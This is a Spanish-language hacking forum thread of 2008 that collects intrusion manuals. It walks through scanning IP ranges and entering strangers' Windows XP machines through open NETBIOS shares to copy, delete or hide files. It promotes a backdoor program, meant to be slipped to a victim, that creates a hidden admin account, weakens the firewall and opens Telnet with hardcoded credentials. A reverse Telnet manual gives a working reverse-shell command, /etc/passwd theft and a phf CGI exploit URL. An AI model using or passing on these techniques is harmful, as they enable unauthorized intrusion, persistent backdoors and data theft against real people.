De esta manera un rootkit toma control del sistema, es importante conocer estos conceptos básicos para dejar de ser simples usuarios que al obtener un error de ejecución opta por cambiar de aplicación, en lugar de comprender el porque de ese error y cual es su posible solución.

Esto nos da un doble valor agregado... es mas probable que un rootkit se ejecute correctamente en un servidor de alto rendimiento que un equipo windows XP con todos los hotfix aplicados al día, debido a la gran cantidad de aplicaciones tipo socket controladores que poseen. Y, si tomamos en cuenta que en la actualidad los "agentes" (un simple socket) trabajan por UDP entre servidores que alcanzan la red externa de las empresas (discos por iscsi, servidores front-end con bases en oracle atacheadas a storage comunicado por agentes etc etc, pues se trata de una necesidad BASICA), se puede observar que el campo de posibles sistemas vulnerables a este tipo de accionar es muy amplio. Solo basta saber en donde buscar y como hacerlo. Por ejemplo: Operation Manager... software que sirve para obtener información acerca de la topología e infrastructura a nivel aplicativo y de storage en toda un red... trabaja por los puertos 8752 y 8753 de manera predeterminada para los sistemas hitachis UPS y estos a su vez poseen una consola basada en Windows 2000... el campo es muy amplio, obvio Vanquish es un rootkit antiguo, conseguir rootkits actuales no es imposible.

Fuí muy breve pues es muy dificil tratar de explicar todas y cada una de las acciones que toma en cuenta un rootkit para asegurar el sistema a un intruso, pero creo que los aspectos básicos de funcionameinet o fueron abordados de manera concreta.

Saludos y espero haberme explicado correctamente.

Autor: cggj
« Última Modificación: 29/11/2008, 07:38:30 pm por fNiX »

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Intruciones /Ataques
« Respuesta #6 : 13/10/2008, 06:30:55 pm »
Intruciones /Ataques
Pues ahora comenzamos recien con el hacking, el conocimiento previo, osea del capitulo 1 al 6 los debemos de dominar al 200% buscar mucha info y sobre todo aplicarla, colocare de ahora un manual por cada intrucion o ataque, esperando que obtengan todo el conocimiento posible, recordar siempre que debemos de tener la Etica por sobre todas las cosas, no me hago responsable de los malos susos que se les den a estas intruciones, dejando esto en claro comenzare a colocar las intruciones dichas en el indice.

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Manual - Intrusión mediante el protocolo NETBIOS con Windows XP
« Respuesta #7 : 13/10/2008, 06:36:18 pm »


Intrusión mediante el protocolo NETBIOS con Windows XP



Herramientas requeridas
You are not allowed to view links. Register or Login


Hola a todos, soy ranefi, heme aquí nuevamente publicando un poquisho de spam, jejejeje. Pues hoy vamos a aprender a acceder a una máquina mediante el protocolo NETBIOS, sí cochinotes, la ya muy mentada y para algunos, ya muerta técnica de intrusión mediante el protocolo NETBIOS. Pero antes, un poco de teoría.


¿Qué diablos es una IP?

Quizá algunos de ustedes no conozcan qué es una IP, pues bueno mis sucios cochinones, una IP es una serie de números que identifica a nuestras computadoras al momento de conectarnos a Internet, un ejemplo es 129.39.59.69, de hecho, siempre utilizamos las IP, al momento de entrar a una página Web, al descargar un archivo, etc. Esa es una burda pero breve explicación de lo qué es una IP.


Un sucio Rango de IP’s

Ahora, ya saben qué fregados es una IP, con esto nos viene una pregunta, ¿qué por la mamá de Tarzán y la virgen María juntos es un Rango de IP’s? Un rango de IP’s mis enfermos amigos es todo lo que abarca un Comienzo de IP y un Fin de IP, ¿qué dijooooo? Se preguntarán, es fácil, les doy un ejemplo:


Comienzo de IP
129.39.59.0

Fin de IP
129.39.59.255


¿Todo claro peladetes? Espero que sí pues ya no voy a explicar más, MUAJAJAJAJAJA, jejeje, es broma pelaos, miren, el comienzo es 129.39.59.0, después de ésa IP sigue 129.39.59.1, después 129.39.59.2 y así sucesivamente hasta llegar a 129.39.59.255. Eso mis morbosos amigos, es un Rango de IP’s.


Configurando cochinadas

Ya dejémonos de la cochina teoría y comencemos a moverle a la computadora (cuidado que las PC son del diablo y nunca sabes cuando te va a aparecer un BSOD, jejejeje). Comencemos configurando nuestra PC para que tenga habilitado el protocolo NETBIOS, lleven a cabo lo siguiente:
    Clic en Inicio.
    Clic en Panel de control.
    Clic en Conexiones de red.
    Doble clic sobre el icono de conexión (puede que tengan varias conexiones, así que asegúrense de que sea la conexión que usan para acceder a Internet).
    Clic en Propiedades.
    En la ventana que apareció, den doble clic sobre Protocolo Internet (TCP/IP).
    Clic en Opciones avanzadas.
    Clic en la pestaña WINS.
    Clic sobre Habilitar NetBios sobre TCP/IP.
    Clic en Aceptar (lo mismo para las demás ventanas).
Ver siguiente imagen:


Habilitando el protocolo NetBios

Ya que tenemos habilitado el protocolo NETBIOS en nuestra PC, procedemos a abrir la aplicación llamada IPScan para configurar algunos parámetros. Abrimos las opciones (Options-->Options) y damos clic en Only alive y después clic en el botón OK & Save. Ahora introducimos nuestro Rango de IP’s, sí pelaos cochinos, lo que ya vimos anteriormente, recuerden Comienzo de IP y Fin de IP; el Comienzo de IP lo vamos a colocar en el primer cuadro donde dice IP range y el Fin de IP en el cuadro donde dice To. Noten que los cuadros están encerrados por un círculo en la siguiente figura (también se muestra la configuración de la aplicación):


Configurando aplicación e introduciendo un Rango de IP’s


Haciendo cochinadas y un poco de spam

Ahora, lo que falta por hacer es dar clic en el botón Start y esperar a que termine de buscar todas nuestras IP’s, cabe mencionar que si no existe ninguna IP “viva” o activa en el Rango de IP’s que dieron, no les va a aparecer ninguna máquina conectada, así que es probable que tengan que definir otro Rango de IP’s (ni modo cochinones). Pues bueno, suponiendo que ya tienen un Rango de IP’s con máquinas conectadas, les va a aparecer un mensaje indicando el Rango de IP’s, la cantidad de IP’s que se buscaron y las máquinas conectadas. Al lado derecho encontrarán todas las máquinas conectadas (las van a identificar inmediatamente pues tienen un círculo azul a su derecha). No está de más especificar que tapé con una asquerosa pero prudente raya negra todas las IP’s (por cuestiones de seguridad), así que no esperen ver esa misma raya negra en su máquina, jejejejeje. Ver siguiente figura:


Máquinas conectadas encontradas y cuadro de información.

Al ataque marranotes

Ahora viene lo bueno, Damos clic sobre la columna llamada IP (se encuentra encerrada por un círculo) y damos clic derecho sobre una IP (la que más mal les caiga) y elegimos Show-->Show NetBIOS info. Ver siguiente imagen:


Clic derecho sobre columna IP y sobre una IP

A partir de aquí les puede aparecer dos mensajes, uno es un cuadro mostrando información sobre la máquina. Ver siguiente imagen:


Información sobre PC

Y el otro mensaje es uno indicándonos que la maldita máquina jija de la tostada no tiene el protocolo NETBIOS habilitado. Ver siguiente imagen:


Maldito error cochino. La mugrosa máquina no tiene el protocolo NETBIOS habilitado


Suponiendo que tuvieron más suerte que yo y les apareció el mensaje indicando la información NETBIOS de la máquina, deberán abrir la consola de MS-DOS (se abre dando clic en Inicio-->Clic en Ejecutar-->Escriben CMD), estando ya en la consola de MS-DOS escriben lo siguiente: NBTSTAT –A IP_Maquina donde IP_Maquina es la IP de la máquina que les mostró la información. En la siguiente imagen se muestra una IP falsa, pero tomémosla como ejemplo: NBTSTAT –A 111.111.111.22. Les va a aparecer el nombre de la máquina con algunos números raros a la derecha (lo que se encuentra encerrado por un círculo). Ver imagen:


Usar NBTSTAT –A y los cochinos números raros de la derecha

Pues bueno mis mugrosines, permítanme tener el placer (como ya un pelao lo hizo al explicar la intrusión por NETBIOS hace ya unos años, mmmmm no recuerdo su pseudónimo [que por cierto, muchos se dieron el crédito de haber diseñado dicho manual]) de mofarme de sus vanos intentos, pues la máquina que les muestre la misma información que aparece en la imagen anterior no tiene ningún recurso compartido, MUJUJUJAJAAJAJAJAJAJAJA. Jejeje, miren, esto quiere decir que la máquina independientemente de que tenga el protocolo NETBIOS habilitado no comparte recursos y por ende, no podrán acceder a ningún recurso. Lástima Margarito, jejejeje.

Bueno, ya dejémonos de cochinadas y enfoquémonos a una máquina que sí tenga recursos compartidos, repitan los pasos anteriores (sí cochinotes, otra vez a buscar una máquina) hasta que encuentren una máquina que les muestre lo que en la siguiente imagen se encierra (ejemplo con otra IP):


Máquina con recursos compartidos

Si notaron, la imagen anterior muestra el nombre de la máquina (lado izquierdo) y el número raro (lado derecho) el cual indica que sí comparte recursos (el número 20 indica eso). No es el objetivo de este cochino pseudo manual explicar qué diablos significan esos números, así que les recomiendo que vayan a Microsoft.com y le pregunten a Papá Gates qué significan esas cochinadas.

Lo siguiente por hacer es ver qué recursos comparte nuestra víctima, ejem, quiero decir cliente. Deberemos escribir: NET VIEW IP_Maquina donde IP_Maquina es la IP de la máquina conectada, en este caso tomaremos el siguiente ejemplo (ya había explicado esto, no sé por qué diablos lo vuelvo hacer, creo que es por alguna obsesión compulsiva por explicar los detalles obvios, ¡ay de mí!): NET VIEW 222.222.222.222. Les acaba de mostrar los recursos que dicha máquina comparte (en este caso C, Documentos C, F y Mis documentos Audio [otra vez la obsesión, necesito ir al psiquiatra]). Ver siguiente imagen:


Recursos que comparte la cochina máquina objetivo


Ya viendo los recursos que comparte, procedemos a acceder a la máquina, ya saben, clic en Inicio-->Ejecutar-->Y escribimos \\IP_Maquina donde IP_Maquina es la IP de la máquina objetivo (otra vez, jejeje). Ejemplo: \\222.222.222.222 y presionamos Aceptar. Ver siguiente imagen:


En el cuadro Ejecutar escribimos \\IP_Maquina


Tardará un poco en aparecer una ventana con los recursos que comparte, pero aparecerá, eso se los aseguro (a menos que el bato loco cholo marihuano forever se haya desconectado de repente). A partir de aquí es cuestión de que den doble clic sobre uno de los recursos y comiencen a hacer travesurillas cochinas, jejejeje. Ver siguiente imagen:


Máquina remota con recursos compartidos (sí es una máquina remota real, pero sepa la cochinada de quién diablos es, jejeje)


ranefi, no seas cochino, algo no funcionó

Pues bueno, si algo no llegó a funcionar y seguieron estos pasos al pie de la letra, quiere decir que Diosito no los quiere y tendrán que ponerse a estudiar cómo jaquiar jotmeil, jajajajajaja. No es cierto, jajajaja, es broma. Hay veces en las que la aplicación IPScan mostrará información de NETBIOS y hasta en la consola de MS-DOS les mostrará el tan buscado número 20 de los “números raros de la derecha”, pero que al momento de hacer NET VIEW IP_Maquina les muestra un cochino error que dice No se ha encontrado la ruta de acceso a la red. Bueno, esto se debe a que pudo ser que el cochino usuario se desconectó o que simplemente deberás escribir NET USE \\IP_Maquina o también NET VIEW \\IP_Maquina (noten las dos barras invertidas). En caso de que ninguna de estas opciones funcione, simplemente les recomiendo que cambien de máquina o busquen una mejor forma de acceder a ellas (Papá Gates les dice cómo en su página).


Ya estamos dentro ranefi amo y señor del universo, ahora, ¿qué podemos hacer?

Jajaja, bonito título, es sólo para alimentar mi autoestima, jarkjarkjarkjark (risa de nerd). Bueno, esta sección es sólo para especificar qué se puede hacer y qué No se puede hacer. Las cosas que se podrán hacer dependerán de los recursos compartidos y de los permisos de lectura/escritura establecidos en dichos recursos, lo explico de otra forma, supongamos que encuentran una PC que comparte la carpeta de Mis documentos y que los permisos para la carpeta son de sólo lectura, pues mis sucios pelaos, con semejantes restricciones lo único que podremos hacer es pasearnos por las carpetas y ver y copiar archivos (existe una forma de ganar privilegios, pero no es el objetivo de este manual).

Todo lo contrario a lo anterior si se accede a una máquina con recursos compartidos y con privilegios de escritura/lectura, pues podrán copiar, eliminar, modificar, renombrar o esconder archivos con toda la libertad del mundo. Cabe mencionar que cualquier proceso llevado a cabo en la máquina remota será exageradamente lento, así que llénense de paciencia y un champurrado con unas donas glaseadas con mermelada.


Eso es todo mis cochinotes morbosotes, espero que les haya gustado esta cochinada y recuerden, ¡arriba el spam! Yujuuuuuuuuuuuuuuu.

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Que es TELNET????
Es un protocolo, es decir un programa que permite la conexion remota entre un servidor (servidor telnet) y uno o varios clientes (terminales) que son el o los PC's que se conectan a ese servidor usando un nombre y una contraseña. Las diferencias principales estan en que no tienen un entorno grafico ya que la conexion y las acciones como copiar, cambiar de ficheros cambiar de directorios y muchas otras se realizan en modo consola es decir un entorno no grafico similar al del MS DOS, otra caracteristica es la de hacer el "logeado" o autentificacion de usuario llevando la peticion al servidor en modo de texto plano, quiere decir
que los datos no viajan encritptados y son faciles de capturar para poder ingresar a una maquina con el nombre y pass de otro usuario, por lo cual se dejo de utilizar hace algunos años y se remplazo por SSH que seria una version mejorada de telnet por la encriptacion de datos que maneja al pasar información....

Como configurar a nuestro PC para que sea un servidor TELNET???
- Primero entra a Inicio - Panel de Control - Herramientas - Administrativas
Servicios.



Veras que hay varios bajas y buscas "Telnet" le haces dos click's y veras en Tipo de Inicio = Deshabilitado lo cambias por Automatico quiere decir que se iniciara cada vez que el windows se cargue.




- Luego te vas a Iniciar Sesion y le haces click a "Esta Cuenta" ahi pones
el nombre de un Administrador de tu PC ya sea el tuyo o puedes crear otro en Inicio - Panel de Control - Cuentas de Usuario y creas uno nuevo para telnet



La contraseña puedes colocarla tanto en la Cuenta de Usuario como en Inicar sesion en la Pestaña de Propiedades de Telnet, o simplemente en Inicar sesion en la Pestaña de Propiedades de Telnet da igual, lo que nos interesa es que la contraseña este en La configuracion de TELNET.

Ahora esta cuenta que creaste te sirve para que desde pc remoto
puedas configurar las opciones de TELNET es decir inicios de sesion,
numero de intentos fallidos en la conexion de un usuario cliente
el puerto que utilizaras para la conexion telnet, es decir una cuenta
de ADMINISTRADOR telnet.



En mi caso cree un adminsitrador llamado "Telnet" para agregarlo a Inicar Sesion

/*Si solo quieres conectarte no es necesario este paso de Iniciar sesion
solo necesitas tener una cuenta en Cuentas de Usuario del panel de control y listo entras con ese nombre y contraseña :D*/

Luego de hacer esto reinicias tu PC y cuando cargue de nuevo windows
haces Inicio --- ejecutar --- cmd y entraras a la consola de MS DOS
ahi pulsas "tlntadmn" sin comillas y te saldra esto:



si no hiciste todos los pasos bien te saldra:



si todo fue bien ya tienes echo tu servidor telnet ahora puedes configurar algunos parametros
con comandos de tlntadmn como ser:

Para administrar un equipo que ejecuta el servidor Telnet
Sintaxis
tlntadmn [\\servidorRemoto] [start] [stop] [pause] [continue] [-u nombreDeUsuario-p contraseña]
Parámetros
\\ servidorRemoto
Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local.
start
Inicia el servidor Telnet.
stop
Detiene el servidor Telnet.
pause
Interrumpe el servidor Telnet.
continue
Reanuda el servidor Telnet.
-u nombreDeUsuario -p contraseña
Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas.
/?
Muestra Ayuda en el símbolo del sistema.


Para administrar sesiones Telnet
Sintaxis
tlntadmn [\\servidorRemoto] [-s] [-k{IdDeSesión | all}] [-m {IdDeSesión | all} "mensaje"]
Parámetros
\\ servidorRemoto
Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local.
-s
Muestra las sesiones Telnet activas.
-k{IdDeSesión | all}
Termina sesiones. Escriba el identificador de sesión para terminar una sesión específica o escriba all para terminar todas las sesiones.
-m {IdDeSesión | all} "mensaje"
Envía un mensaje a una o varias sesiones. Escriba el identificador de sesión para enviar un mensaje a una sesión específica o escriba all para enviar un mensaje a todas las sesiones. Escriba el mensaje que desea enviar entre comillas (es decir, "mensaje").
/?
Muestra Ayuda en el símbolo del sistema.


Para establecer el dominio predeterminado en un equipo que ejecuta el servidor Telnet
Sintaxis
tlntadmn [\\servidorRemoto] config [dom=nombreDeDominio] [-u nombreDeUsuario-p contraseña]
Parámetros
\\ servidorRemoto
Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local.
dom= nombreDeDominio
Especifica el dominio que desea convertir en el dominio predeterminado.
-u nombreDeUsuario -p contraseña
Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas.
/?
Muestra Ayuda en el símbolo del sistema.
Ejemplos
Para hacer de Server1 el dominio predeterminado en el servidor local, escriba:
tlntadmn config dom=Server1
Para asignar la tecla Alt en un equipo que ejecuta el servidor Telnet
Sintaxis
tlntadmn [\\servidorRemoto] config [ctrlakeymap={yes | no}] [-u nombreDeUsuario-p contraseña]
Parámetros
\\ servidorRemoto
Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local.
ctrlakeymap={yes | no}
Especifica si desea que el servidor Telnet interprete CTRL+A como ALT. Escriba yes para asignar la tecla de método abreviado o no para impedir la asignación.
-u nombreDeUsuario -p contraseña
Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas.
/?


Para establecer el número máximo de conexiones en un equipo que ejecuta el servidor Telnet
Sintaxis
tlntadmn [\\servidorRemoto] config [maxconn=enteroPositivo] [-u nombreDeUsuario-p contraseña]
Parámetros
\\ servidorRemoto
Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local.
maxconn= enteroPositivo
Establece el número máximo de conexiones. Este número debe especificarse con un entero positivo que sea más pequeño que 10 millones.
-u nombreDeUsuario -p contraseña
Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas.
/?
Muestra Ayuda en el símbolo del sistema.


Para establecer el número máximo de intentos de inicio de sesión erróneos en un equipo que ejecuta el servidor Telnet
Sintaxis
tlntadmn [\\servidorRemoto] config [maxfail=enteroPositivo] [-u nombreDeUsuario-p contraseña]
Parámetros
\\ servidorRemoto
Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local.
maxfail= enteroPositivo
Establece el número máximo de intentos de inicio de sesión erróneos que se le permite a un usuario. Este número debe especificarse con un entero positivo que sea más pequeño que 100.
-u nombreDeUsuario -p contraseña
Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas.
/?
Muestra Ayuda en el símbolo del sistema.
Para establecer el modo de operación en un equipo que ejecuta el servidor Telnet
Sintaxis
tlntadmn [\\servidorRemoto] config [mode={console | stream}] [-u nombreDeUsuario-p contraseña]
Parámetros
\\ servidorRemoto
Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local.
mode={console | stream}
Establece el modo de operación.
-u nombreDeUsuario -p contraseña
Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas.
/?
Muestra Ayuda en el símbolo del sistema.
Para establecer el puerto Telnet en un equipo que ejecuta el servidor Telnet
Sintaxis
tlntadmn [\\servidorRemoto] config [port=valorEntero] [-u nombreDeUsuario-p contraseña]
Parámetros
\\ servidorRemoto
Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local.
port= valorEntero
Establece el puerto Telnet. Debe especificar el puerto con un entero más pequeño de 1.024.
-u nombreDeUsuario -p contraseña
Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas.
/?
Muestra Ayuda en el símbolo del sistema.
Para establecer los métodos de autenticación en un equipo que ejecuta el servidor Telnet
Sintaxis
tlntadmn [\\servidorRemoto] config [sec=[{+ | -}ntlm][{+ | -}passwd]] [-u nombreDeUsuario-p contraseña]
Parámetros
\\ servidorRemoto
Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local.
sec=[{+ | -}ntlm][{+ | -}passwd]
Especifica si desea utilizar NTLM, una contraseña o ambos para autenticar intentos de inicio de sesión. Para utilizar un tipo determinado de autenticación, escriba un signo más (+) antes de ese tipo de autenticación. Para impedir el uso de un determinado tipo de autenticación, escriba un signo menos (-) antes de ese tipo de autenticación.
-u nombreDeUsuario -p contraseña
Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas.
/?
Muestra Ayuda en el símbolo del sistema.


Para establecer el tiempo de espera para sesiones de inactividad en un equipo que ejecuta el servidor Telnet
Sintaxis
tlntadmn [\\servidorRemoto] config [timeout=hh:mm:ss] [-u nombreDeUsuario-p contraseña]
Parámetros
\\ servidorRemoto
Especifica el nombre del servidor remoto que desea administrar. Si no se especifica un servidor, se utilizará el servidor local.
timeout= hh : mm : ss
Establece el período de tiempo de espera en horas, minutos y segundos.
-u nombreDeUsuario -p contraseña
Especifica las credenciales administrativas del servidor remoto que desea administrar. Este parámetro es necesario si desea administrar un servidor remoto en el que no haya iniciado una sesión con credenciales administrativas.
/?
Muestra Ayuda en el símbolo del sistema.


Doy un ejemplo aqui de como configurar el puerto que utilizara telnet
para su conexion:



Aqui cambiamos el puerto por defecto 23 al puerto 100
Nota.- El puerto que utilize telnet debe ser menor a 1024 :D

Ahora como veran en este ejemplo yo cambie el puerto que era el 23 a el
100 entonces para probar que me funciona mi servidor telnet voy a
inicio ejecutar "telnet 127.0.0.1 100"
Porque?
127.0.0.1 es la IP interna o localhost que tienen todos los PC's por
defecto entonces y yo la utilizo para hacer una autoconexion a mi mismo
para ver si esta bien mi servidor telnet
100   es el puerto que cambiamos al servidor telnet

se veria asi:



le teclamos "s" y damos enter
Nos saldra login:
           pass:


colocamos el que tengamos en el PC en este caso yo tengo usuario telnet
y un pass luego nos mostrara la Bienvenida y ya sabemos que funciona
asi que probarlo desde una maquina remota :D, cuando se intente probar
desde un pc remoto fijarse que tenga abierto el puerto que le asignamos
a nuestro servidor para hacer la conexion :D



Los comandos que se utilizan para moverse en telnet que tb sirven para ftp estan en escritos en UNIX, asi que aqui les dejo el enlace para que puedan ver que comandos les interesa saber :D como ser "get" "mget" que son los que sirven para descargar archivos de un pc remoto:D

You are not allowed to view links. Register or Login
o
You are not allowed to view links. Register or Login

Si hacen una autoconexion o en una LAN pueden utilizar comandos de MS DOS como ser cd, md, dir y muchos otros para moverse en su disco duro :D

NOTA.- En caso de querer comunicarnos desde un PC remoto tendriamos que hacer
Inicio - ejecutar- telnet "la IP publica del PC" 100
es decir la Ip ya seria la que nos sale en internet cuando vamos a cual es mi IP
You are not allowed to view links. Register or Login





Programa Para intrucion automatica via Telnet.
[/color]

Hice hace un rato un programa que lo pueden descargar de
You are not allowed to view links. Register or Login
o You are not allowed to view links. Register or Login
o tb en
You are not allowed to view links. Register or Login
o You are not allowed to view links. Register or Login

ENLACES ACTUALIZADOS :D

Tiene las siguientes funciones:
- Crea un Usuario Administrador en el CPU donde se ejecuta
- Activa el servicio TELNET
- Se cuela en los servicios permitidos del Firewall de Windows y disminuye
su proteccion de manera silenciosa
- Permite conexion remota con USUARIO: Microsoft   PASSWORD:  microchip
(respetando mayusculas y minusculas) los que conocen de telnet sabran
que necesitan hacer

TELNET 200.255.2.XXX (ip de la victima)
Usuario: Microchip
pass: micro

esperar unos segundos y se conecta, puede tardar hasta mas de un minuto...

- Por ultimo se ejecuta cada vez que se inicia windows je je!!!

/* Esta es la versión Beta, quisiera que lo probaran con los firewalls
de marca como ser Kasp, Norton Internet Segurity, panda y demas*/
esto para mejorarlo y sacar la version final que en teoria deberia pasar
cualquier firewall, pero veremos eso :D

Asi que les pido que hagan la prueba para ver que errores puede presentar
y con que programas o firewalls ok???

Una cosa mas mejor si lo prueban personas que conozcan de conexion y comandos
telnet para evitar que posten preguntas como "que comandos uso para ver
el disco duro??"  :S o tonterias como esas.

No vi este metodo en ningun lugar asi que los creditos me los atribuyo :D

Como ya supondran la victima primero debe ejecutar este archivo ejecutable
para que nos abra la puerta telnet, no explicare como mezclar con otro archivo
ni como mandarlo ni nada, de hecho la persona que quiere usarlo ya debe
saber eso, una cosa mas no lo detecta ningun antivirus, esperemos
que tampoco los firewalls :D lo probaria yo pero no tengo tantos firewalls
instalados je je!!! ni tiempo :S
Saludos

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Reverse Telnet
« Respuesta #9 : 13/10/2008, 06:42:00 pm »
Reverse Telnet
1.     ¿Que es reverse telnet?

Bueno, pues como su nombre indica es una tecnica basada en telnet, es decir abrir una sesion remota entre una maquina y otra, pero al contrario que en otros ataques, en este caso, la maquina atacada (target host) va a ser la que nos haga telnet a nosotros, de hay lo de reverse, a esta tecnica tambien se le llama back channel, y es muy util cuando queremos hacer telnet a una maquina y no esta habilitado el puerto del telnet.

2. Explicacion del proceso y ejemplos.

El proceso es bastante simple, se trata simplemente de invertir el proceso de telnet, es decir en vez de iniciar la sesion en nuestro lado y terminarla en un servidor remoto, lo que vamos a hacer es abrir unos puertos en nuestra maquina que actuaran de servidor e iniciar un cliente en la maquina remota.

Como habilitamos el pseudo-servidor en nuestra maquina?, bien, recurrimos al nunca bien valorado netcat, posiblemente una de las mejores herramientas que se han inventado nunca, bien vamos a levantar dos puertos, uno para enviar datos y otro para recibir datos, ejecutamos, cada uno en una terminal:

   nc -nvv -l -p 80
   nc -nvv -l -p 25

Parametros:

      -n    Solo IPs numerica.
      -vv    Modo Mega-verbose.
      -l    Listen mode. Espera a conexiones entrantes.
      -p    Numero del puerto que queremos habilitar.

Bien, ya hemos levantado nuestro peculiar servidor de telnet en nuestra maquina (192.168.1.4), ahora lo que tenemos que hacer es iniciar la conexion dese la maquina remota, como hacemos esto, tambien bastante simple, pero se te tiene que ocurrir, escribimos el siguiente comando:

   telnet 192.168.1.4 80 | /bin/sh | telnet 192.168.1.4 25

Explicacion, abrimos una conexion desde la maquina remota al puerto 80 de nuestra maquina, le hacemos llegar la entrada de esta conexion a una shell (/bin/sh) mediante un pipe y redirigimos la salida de la shell mediante otro pipe a una nueva conexion a nuestra maquina, al puerto 25, por donde vamos a recibir las respuestas.

Bien, ya tenemos todo el tinglado montado, ahora solo falta que funcione, deberiamos tener lo siguiente en cada terminal:

Terminal 1 - Puerto 80 - Envio de comandos
------------------------------------------
[root@vaca netcat]# ./nc -nvv -l -p 80
listening on [any] 80 ...

Terminal 2 - Puerto 25 - Recepcion de respuestas
-----------------------------------------------
[root@vaca netcat]# ./nc -nvv -l -p 25
listening on [any] 25 ...


Si fuesemos capaces de ver lo que se ejecuta en la maquina remota veriamos esto...

Target Host
-----------
[root@pollo netcat]# telnet 192.168.1.4 80 | /bin/sh | telnet 192.168.1.4 25
Trying 192.168.1.4...
Connected to 192.168.1.4.
Escape character is '^]'.
/bin/sh: Trying: command not found
/bin/sh: Connected: command not found
/bin/sh: Escape: command not found


y digo si fuesemos capaces, porque lo normal sera que no le veamos, si no, para
que ibamos a montar este tinglado.


Paso siguiente, ejecutar comandos en la maquina remota, para hacer esto debemos
enviar a traves de nuestra terminal con el netcat en el puerto 80, los comandos
en un formato especifico, este formato es el siguiente:

echo `comando_a_ejecutar parametros`

veamos un ejemplo practico de esto, ejecutemos el tipico y deseado cat /etc/passwd y a ver que pasa...

Terminal 1 - Puerto 80 - Envio de comandos
------------------------------------------
[root@vaca netcat]# ./nc -nvv -l -p 80
listening on [any] 80 ...
connect from (UNKNOWN) [192.168.1.2] 2144
echo `cat /etc/passwd`

Terminal 2 - Puerto 25 - Recepcion de respuestas
-----------------------------------------------
[root@vaca netcat]# ./nc -nvv -l -p 25
connect from (UNKNOWN) [192.168.1.2] 2145
root:x:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:dae
mon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/
sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbi
n:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/var/spool/news:
 uucp:*:10:14:uucp:/var/spool/uucp: operator:*:11:0:operator:/root: games:*:12:1
00:games:/usr/games: gopher:*:13:30:gopher:/usr/lib/gopher-data: ftp:*:14:50:FTP
 User:/home/ftp: nobody:*:99:99:Nobody:/: xfs:!!:100:101:X Font Server:/etc/X11/
fs:/bin/false gdm:!!:42:42::/home/gdm:/bin/bash

pues ya esta, igual que hemos ejecutado ese cat, podemos ejecutar cualquier comando bajo el id con el que hayamos ejecutado el comando en la maquina remota.

Si pensamos un poco, llegamos a la conclusion, para que narices me sirve esto si para ejecutar el telnet en la maquina remota tengo que tener acceso a ella, si, pero hay accesos y accesos.

3. Cuando utilizar reverse telnet.

Bien, parece que en el punto anterior, no quedaba clara la utilidad de esta tecnica, bien en este punto vamos a ver como si la tiene, la primera y mas clara utilidad es si tenemos una maquina en la que por ejemplo, tenemos acceso a un cgi-bin/phf/php mal configurado y que nos permita ejecutar algun comando desde el navegador, bien, ejecutamos el comando citado anteriormente y plas, tenemos una shell sin usuario y sin password, el ejemplo usando el bug del phf, que aun existe, seria el siguiente:

You are not allowed to view links. Register or Login$0a/bin/telnet/%20192.168.1.4%2080%20|%20/bin/sh%20|%20/bin/telnet%20192.168.1.4%2025

y ya tendriamos nuestra shell up&running, igualmente podemos utilizar exploits remotos que solo nos permiten ejecutar codigo en el servidor para poner en practica esta tecnica, en fin, echadle imaginacion.

Porque utilizar precisamente esos puertos, osea 25 y 80, simple, si la maquina esta firewalleada, es mas facil que tenga abiertos hacia afuera puertos de servicio comunes, que puertos mas altos o que se usen menos.

4. Herramientas y software.

La unico que necesitas para llevar a cabo esta tecnica es el netcat y un navegador.

You are not allowed to view links. Register or Login

Manual extraido de:
You are not allowed to view links. Register or Login

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
MANUAL PARA ENTRAR VIA IPC$
« Respuesta #10 : 13/10/2008, 06:45:02 pm »
weno para empeza las presentaciones, es un manual hecho por -----xBitcoOL --------
pff decir que es necesario que la vicitima no tenga service pack 6

Lean Detenidamente:

Para comenzar dare las instrucciones para hacer una entrada limpia via IPC$, este recurso nos dara dotacion para poder explorar en los discos duros y configuraciones.

